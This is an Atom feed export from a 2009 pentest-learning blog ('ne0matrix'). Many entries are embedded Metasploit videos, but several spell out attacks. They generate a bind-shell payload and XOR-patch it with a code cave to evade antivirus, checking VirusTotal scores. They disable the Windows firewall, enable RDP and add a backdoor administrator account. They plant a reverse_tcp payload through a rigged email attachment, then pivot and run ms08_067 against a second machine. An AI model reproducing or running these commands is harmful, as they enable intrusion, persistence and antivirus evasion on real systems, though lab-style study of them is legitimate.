<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-8552451715132165658</id><updated>2011-07-08T18:27:36.013+02:00</updated><title type='text'>ne0matrix</title><subtitle type='html'>Learning and testing</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>ne0matrix</name><uri>http://www.blogger.com/profile/01064235721144009241</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>14</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-8986212027734945418</id><published>2009-06-14T18:25:00.001+02:00</published><updated>2009-06-14T18:26:22.692+02:00</updated><title type='text'>Fun with metasploit</title><content type='html'>&lt;embed src="http://blip.tv/play/AYGJskCN92g" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-8986212027734945418?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/8986212027734945418/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/06/fun-with-metasploit.html#comment-form' title='4 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/8986212027734945418'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/8986212027734945418'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/06/fun-with-metasploit.html' title='Fun with metasploit'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-8330390740395560375</id><published>2009-05-23T14:18:00.006+02:00</published><updated>2009-05-23T15:07:18.133+02:00</updated><title type='text'>Metasploit daemon - msfd II</title><content type='html'>&lt;embed src="http://blip.tv/play/AYGD8VyN92g" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt; &lt;br /&gt;This plugin provides an msf daemon interface that spawns a listener on a &lt;br /&gt;defined port (default 55554) and gives each connecting client its own &lt;br /&gt;console interface.  These consoles all share the same framework instance. &lt;br /&gt;&lt;br /&gt;link:&lt;br /&gt;http://trac.metasploit.com/browser/framework3/trunk/plugins/msfd.rb&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-8330390740395560375?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/8330390740395560375/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/metasploit-daemon-msfd-ii.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/8330390740395560375'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/8330390740395560375'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/metasploit-daemon-msfd-ii.html' title='Metasploit daemon - msfd II'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-5281582795127698195</id><published>2009-05-22T17:48:00.012+02:00</published><updated>2009-05-23T14:34:57.129+02:00</updated><title type='text'>Metasploit daemon - msfd I</title><content type='html'>&lt;embed src="http://blip.tv/play/AYGD8GSN92g" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt; &lt;br /&gt;&lt;br /&gt;Utility that opens the Metasploit framework for remote access. Basically turns the framework on the local machine into a server for remote machines.&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Location: &lt;/span&gt;&lt;br /&gt;/pentest/exploit/framework3&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Usage: &lt;/span&gt;&lt;br /&gt;./msfd -a &lt;listening_ip_address&gt; -d -p &lt;listening_port&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Example: &lt;/span&gt;&lt;br /&gt;./msfd -a 192.168.1.100 -d -p 4444&lt;br /&gt;[*] Initializing msfd...&lt;br /&gt;[*] Running msfd...&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;links:&lt;/span&gt;&lt;br /&gt;https://wiki.remote-exploit.org/backtrack/wiki/msfd&lt;br /&gt;http://trac.metasploit.com/browser/framework3/trunk/msfd&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-5281582795127698195?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/5281582795127698195/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/metasploit-daemon-msfd-i.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/5281582795127698195'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/5281582795127698195'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/metasploit-daemon-msfd-i.html' title='Metasploit daemon - msfd I'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-7974437057729358247</id><published>2009-05-21T21:53:00.001+02:00</published><updated>2009-05-21T21:53:47.546+02:00</updated><title type='text'>Metasploit keylogging</title><content type='html'>&lt;embed src="http://blip.tv/play/AYGDuUON92g" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-7974437057729358247?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/7974437057729358247/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/metasploit-keylogging.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/7974437057729358247'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/7974437057729358247'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/metasploit-keylogging.html' title='Metasploit keylogging'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-8170536350202267553</id><published>2009-05-16T23:53:00.009+02:00</published><updated>2009-05-17T10:23:19.869+02:00</updated><title type='text'>Msfencode + Xor encoding ==&gt; 15%</title><content type='html'>Fichier encodedbindtcpx.exe reçu le 2009.05.16 23:23:28 (CET)Situation actuelle: terminé&lt;br /&gt;Résultat: 6/40 (15.00%)&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482"&gt;http://www.virustotal.com/fr/analisis/2dcd8d8636d7aae5dd1ae629abcca482&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;embed src="http://blip.tv/play/AYGClQiN92g" width="400" height="300" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-8170536350202267553?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/8170536350202267553/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/msfencode-xor-encoding-15.html#comment-form' title='1 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/8170536350202267553'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/8170536350202267553'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/msfencode-xor-encoding-15.html' title='Msfencode + Xor encoding ==&gt; 15%'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-1147101698612997048</id><published>2009-05-15T20:46:00.017+02:00</published><updated>2009-05-17T00:03:09.453+02:00</updated><title type='text'>msfencode vs XOR encryption</title><content type='html'>./msfpayload windows/shell_bind_tcp LPORT=55555 X &gt; ***.exe&lt;br /&gt;&lt;br /&gt;Fichier bindtcpx.exe reçu le 2009.05.15 20:33:46 (CET)&lt;br /&gt;Situation actuelle: terminé&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Résultat: 12/40 (30.00%)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49"&gt;http://www.virustotal.com/fr/analisis/86902b47b990be990c8dbccfd2628e49&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;--------------------------&lt;br /&gt;Execution flow hijack ==&gt; XOR encryption&lt;br /&gt;&lt;br /&gt;Fichier bindtcpx1.exe reçu le 2009.05.15 20:35:25 (CET)&lt;br /&gt;Situation actuelle: terminé&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Résultat: 8/40 (20.00%)&lt;/span&gt;&lt;br /&gt;&lt;a href="http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231"&gt;http://www.virustotal.com/fr/analisis/768667c427ae3001c11dff126c54f231&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;--------------------------&lt;br /&gt;./msfpayload windows/shell_bind_tcp LPORT=55555 R msfencode -b '' -t exe -o ***.exe&lt;br /&gt;&lt;br /&gt;Fichier encodedbindtcp.exe reçu le 2009.05.16 23:33:49 (CET)Situation actuelle: terminé&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Résultat: 10/40 (25.00%)&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;&lt;a href="http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e"&gt;http://www.virustotal.com/fr/analisis/4a7e5c372c5292c0a56799ad75b10b3e&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-1147101698612997048?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/1147101698612997048/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/msfencode-vs-xor-encryption.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/1147101698612997048'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/1147101698612997048'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/msfencode-vs-xor-encryption.html' title='msfencode vs XOR encryption'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-2358059076776808339</id><published>2009-05-15T18:02:00.034+02:00</published><updated>2009-05-16T08:57:21.568+02:00</updated><title type='text'>Execution flow hijack + XOR encryption</title><content type='html'>&lt;embed src="http://blip.tv/play/AYGB+yqN92g" width="400" height="300" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;br /&gt;&lt;br /&gt;***Based on the shmoocon demo made by Muts***&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Backtrack:&lt;/span&gt;&lt;br /&gt;msfpayload windows/shell_bind_tcp LPORT=55555 X &gt; bindtcp.exe&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Windows:&lt;/span&gt;&lt;br /&gt;Click on the file ==&gt; bindshell on port 55555&lt;br /&gt;check: netstat -na find "55555"&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;PEditor&lt;/span&gt;&lt;br /&gt;.idata: vsize:500 - rsize:400&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;hexedit: &lt;/span&gt;&lt;br /&gt;+ 200 hex bytes&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;&lt;br /&gt;--------------&lt;br /&gt;--OLLYdbg--&lt;br /&gt;--------------&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;first instructions:&lt;/span&gt;&lt;br /&gt;00401000 &gt; 31C0 XOR EAX,EAX&lt;br /&gt;&lt;br /&gt;00401002 68 34104000 PUSH &lt;jmp.&amp;kernel32.exitprocess&gt;&lt;br /&gt;00401007 . 64:FF30 PUSH DWORD PTR FS:[EAX]&lt;br /&gt;0040100A . 64:8920 MOV DWORD PTR FS:[EAX],ESP&lt;br /&gt;0040100D . 6A 40 PUSH 40&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;Code cave: 00401066&lt;/span&gt;&lt;br /&gt;start: 00401002&lt;br /&gt;end: 00401060&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;XOR loop:&lt;br /&gt;MOV EAX, 00401002 # Start of encoding address.&lt;br /&gt;XOR BYTE PTR DS: [EAX], 5E # XOR the contents of EAX with the key 5E&lt;br /&gt;INC EAX # Increase EAX&lt;br /&gt;CMP EAX, 00401060 # Tests to see if we've reached the end of our enc&lt;br /&gt;JLE SHORT xxx # If not, jump back to XOR command&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;After the loop:&lt;/span&gt;&lt;br /&gt;XOR EAX,EAX (overwritten instructions)&lt;br /&gt;JMP 00401002 (the address after the overwritten instructions)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;------------------&lt;br /&gt;Commentaires&lt;br /&gt;------------------&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;1- Créer un payload bind_tcp&lt;/span&gt;&lt;br /&gt;msfpayload windows/shell_bind_tcp LPORT=55555 X &gt; bindtcp.exe (par exemple)&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;2- Le scanner via virustotal (résultat...)&lt;/span&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;3- Cliquer sur le payload et vérifier que le port un ouvert&lt;/span&gt;&lt;br /&gt;netstat -na find "55555"&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;4- Exécuter le payload dans PEditor&lt;/span&gt;&lt;br /&gt;-Modifier la section .idata&lt;br /&gt;vsize:500 &amp;amp; rsize:400&lt;br /&gt;Elle doit être readable, writable et executable.&lt;br /&gt;-Modifier la section .text (readable, Writable et executable)&lt;br /&gt;Enregistrer&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;5- Ouvrir le payload avec Hexedit&lt;/span&gt;&lt;br /&gt;-Ajouter 200 hex bytes&lt;br /&gt;Puisque (initial-rsize=200, actual-rsize=400 ) 400-200 ==&gt; 200.&lt;br /&gt;Enregistrer&lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099ff;"&gt;6- Lancer le payload via Ollydbg&lt;/span&gt;&lt;br /&gt;-Copier les 1eres instructions dans notepad (pour repérer les instructions qui seront remplacées)&lt;br /&gt;-Trouver un espace libre pour le "code-cave"&lt;br /&gt;-Retouner à l'OEP(entrypoint/début), remplacer la 1ere instruction par "JMP adresse-du-code-cave"&lt;br /&gt;-Définir/repérer l'adresse à laquelle doit commencer l'encodage&lt;br /&gt;-Définir/repérer l'adresse à laquelle doit se terminer l'encodage, et modifier la boucle ASM avec ces adresses.&lt;br /&gt;-Après la boucle, introduire l'instruction (les instructions) qui a été remplacée par le JMP du début.&lt;br /&gt;-Et terminer par un 2e JMP vers l'adresse [00401002] qui suit l'instruction remplacée&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-2358059076776808339?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/2358059076776808339/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/execution-flow-hijack-xor-encryption.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/2358059076776808339'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/2358059076776808339'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/execution-flow-hijack-xor-encryption.html' title='Execution flow hijack + XOR encryption'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-9042401262163013240</id><published>2009-05-03T16:10:00.015+02:00</published><updated>2009-05-03T17:42:32.255+02:00</updated><title type='text'>Meterpreter Autoscript scraper.rb</title><content type='html'>&lt;embed src="http://blip.tv/play/Af7ee433aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt; &lt;br /&gt;&lt;p&gt;&lt;a href="http://trac.metasploit.com/browser/framework/trunk/scripts/meterpreter/scraper.rb?rev=6091"&gt;scraper.rb on metasploit [dot] com&lt;br /&gt;&lt;/a&gt;&lt;/p&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://trac.metasploit.com/wiki/AutomatingMeterpreter"&gt;http://trac.metasploit.com/wiki/AutomatingMeterpreter&lt;/a&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-9042401262163013240?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/9042401262163013240/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/meterpreter-autoscript-scraperrb.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/9042401262163013240'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/9042401262163013240'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/meterpreter-autoscript-scraperrb.html' title='Meterpreter Autoscript scraper.rb'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-6823041787310848986</id><published>2009-05-03T14:05:00.015+02:00</published><updated>2009-05-24T13:04:45.228+02:00</updated><title type='text'>Remote desktop configuration</title><content type='html'>&lt;embed src="http://blip.tv/play/Af7dXo33aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt; &lt;br /&gt;&lt;br /&gt;&lt;span style="color:#0099FF;"&gt;&lt;br /&gt;Getgui script:&lt;/span&gt;&lt;br /&gt;&lt;p&gt;&lt;a href="http://trac.metasploit.com/browser/framework3/trunk/scripts/meterpreter/getgui.rb"&gt;getgui.rb&lt;/a&gt; on metasploit&lt;br /&gt;run getgui -h&lt;br /&gt;&lt;/p&gt;&lt;span style="color:#0099FF;"&gt;&lt;br /&gt;manual config:&lt;/span&gt;&lt;div style="width:800; height:180; overflow:auto; border:solid 1px white;"&gt;&lt;br /&gt;Netstat –na  find “3389”&lt;br /&gt;Netsh firewall show opmode&lt;br /&gt;netsh firewall set opmode mode=DISABLE&lt;br /&gt;netsh firewall set opmode exception=ENABLE&lt;br /&gt;netsh firewall set service type = remotedesktop mode = enable&lt;br /&gt;netsh firewall set service type = remotedesktop mode = enable scope=CUSTOM 192.168.1.64&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" find "fDenyTSConnections"&lt;br /&gt;&lt;br /&gt;reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f&lt;br /&gt;&lt;br /&gt;net user morpheus thematrix /add&lt;br /&gt;net localgroup "Utilisateurs de Bureau à distance" /add"&lt;br /&gt;net localgroup Administrateurs morpheus /add&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-6823041787310848986?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/6823041787310848986/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/remote-desktop-configuration.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/6823041787310848986'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/6823041787310848986'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/remote-desktop-configuration.html' title='Remote desktop configuration'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-7587523207961879061</id><published>2009-05-02T22:13:00.043+02:00</published><updated>2009-05-24T13:02:49.550+02:00</updated><title type='text'>Meterpreter attack pivot [video]</title><content type='html'>&lt;embed src="http://blip.tv/play/Af7QFI33aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt; &lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;network 1 (wifi)&lt;br /&gt;R1: xx.xx.xx.xx (public IP)&lt;br /&gt;NAT overload + static PAT (53, 69, 4444, 4445) &lt;br /&gt;A: Laptop BT 192.168.1.8 (attacker)&lt;br /&gt;----------------------------------------------&lt;br /&gt;network 2 &lt;br /&gt;R2: NAT overload (firewall)&lt;br /&gt;B: Desktop XPsp2 192.168.1.67 (target1 - pivot)&lt;br /&gt;C: Laptop XPsp3  192.168.1.66 (target2)&lt;br /&gt;----------------------------------------------&lt;span style="color:#0099FF;"&gt;&lt;br /&gt;A  ==wifi==&gt; * R1 * ---internet--&gt; * R2 * ==wire==&gt; + B + ==wire==&gt;  C &lt;/span&gt;&lt;br /&gt;----------------------------------------------&lt;br /&gt;----------------------------------------------&lt;span style="color:#0099FF;"&gt;&lt;br /&gt;ATTAQUE 1 (B)&lt;/span&gt;&lt;br /&gt;Envoi par email(par ex) d'un fichier douteux (.doc-macrovba, .pdf, .jpg, etc....) qui éxécute un payload reverse tcp.&lt;br /&gt;&lt;br /&gt;&lt;div style="width:400; height:300; overflow:auto; border:solid 1px white;"&gt;msfpayload windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 X &gt; reverse.exe&lt;br /&gt;#pour la démonstration, on a transféré le fichier via tftp&lt;br /&gt;msfconsole&lt;br /&gt;use multi/handler&lt;br /&gt;set payload windows/meterpreter/reverse_tcp&lt;br /&gt;set LHOST 192.168.1.8&lt;br /&gt;set LPORT 4444&lt;br /&gt;exploit&lt;br /&gt;#B éxécute reverse.exe ==&gt; 1ere séssion meterpreter&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;----------------------------------------------&lt;span style="color:#0099FF;"&gt;&lt;br /&gt;CONFIGURATION PIVOT sur B&lt;/span&gt;&lt;br /&gt;&lt;div style="width:400; height:300; overflow:auto; border:solid 1px white;"&gt;portfwd add -L 127.0.0.1 -l 4445 -r 192.168.1.66 -p 445&lt;br /&gt;background&lt;br /&gt;route add 192.168.1.66 255.255.255.255 1&lt;br /&gt;#1 étant le numéro de la séssion&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;----------------------------------------------&lt;span style="color:#0099FF;"&gt;&lt;br /&gt;ATTAQUE 2 (C)&lt;/span&gt;&lt;div style="width:400; height:300; overflow:auto; border:solid 1px white;"&gt;use windows/smb/ms08_067_netapi&lt;br /&gt;set RHOST 192.168.1.66&lt;br /&gt;set RPORT 445&lt;br /&gt;set payload windows/meterpreter/bind_tcp&lt;br /&gt;set LPORT 4445&lt;br /&gt;exploit&lt;br /&gt;#2e séssion meterpreter&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-7587523207961879061?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/7587523207961879061/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/demo-video-meterpreter-pivot-attack.html#comment-form' title='4 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/7587523207961879061'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/7587523207961879061'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/05/demo-video-meterpreter-pivot-attack.html' title='Meterpreter attack pivot [video]'/><author><name>ne0matrix</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8552451715132165658.post-4477726373582011068</id><published>2009-04-26T23:52:00.002+02:00</published><updated>2009-04-26T23:59:03.264+02:00</updated><title type='text'>adobe_utilprintf exploit on XPSP2 [video]</title><content type='html'>&lt;embed src="http://blip.tv/play/Af2Mb433aA" type="application/x-shockwave-flash" width="400" height="300" allowscriptaccess="always" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8552451715132165658-4477726373582011068?l=ne0matrix.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ne0matrix.blogspot.com/feeds/4477726373582011068/comments/default' title='Publier les commentaires'/><link rel='replies' type='text/html' href='http://ne0matrix.blogspot.com/2009/04/adobeutilprintf-exploit-on-xpsp2.html#comment-form' title='0 commentaires'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/4477726373582011068'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8552451715132165658/posts/default/4477726373582011068'/><link rel='alternate' type='text/html' href='http://ne0matrix.blogspot.com/2009/04/adobeutilprintf-exploit-on-xpsp2.html' title='adobe_utilprintf exploit on XPSP2 